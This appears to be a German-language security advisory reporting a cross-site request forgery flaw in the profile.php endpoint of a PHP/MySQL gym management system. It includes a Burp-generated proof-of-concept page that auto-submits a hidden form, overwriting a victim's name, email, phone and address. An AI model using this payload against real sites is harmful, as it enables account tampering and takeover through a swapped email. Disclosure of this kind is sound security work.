
GYM-Managementsystem mit PHP und MYSQL
Ein Gym-Management-System, das mit PHP und MySQL erstellt wurde.
Shoaib Alam - LinkedIn-Profil
Im Gym Management System wurde eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) identifiziert. Dieses Problem tritt in der Profilaktualisierungsfunktion des Benutzerpanels auf.
Die Anwendung verfügt derzeit nicht über die Implementierung von Anti-CSRF-Tokens, was zu einer Anfälligkeit für Cross-Site-Request-Forgery-Angriffe (CSRF) führt. Diese Sicherheitsschwäche betrifft insbesondere den Endpunkt /profile.php. Ein Angreifer kann diese Schwachstelle ausnutzen, um unbefugte Änderungen an sensiblen Benutzerdaten wie Adresse, Name und Telefonnummer vorzunehmen. Dies könnte die Integrität von Benutzerkonten gefährden und zu weiteren Sicherheitsproblemen führen.
Verwundbarer Endpunkt: /profile.php
Unten finden Sie einen Proof of Concept, der die CSRF-Schwachstelle demonstriert. Dieser PoC wurde mit Burp Suite Professional generiert.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/gym/profile.php" method="POST">
<input type="hidden" name="fname" value="hacked" />
<input type="hidden" name="lname" value="victim" />
<input type="hidden" name="email" value="attacker@gmail.com" />
<input type="hidden" name="mobile" value="9999999999" />
<input type="hidden" name="state" value="hacked" />
<input type="hidden" name="city" value="hacked" />
<input type="hidden" name="address" value="hacked" />
<input type="hidden" name="submit" value="Update" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>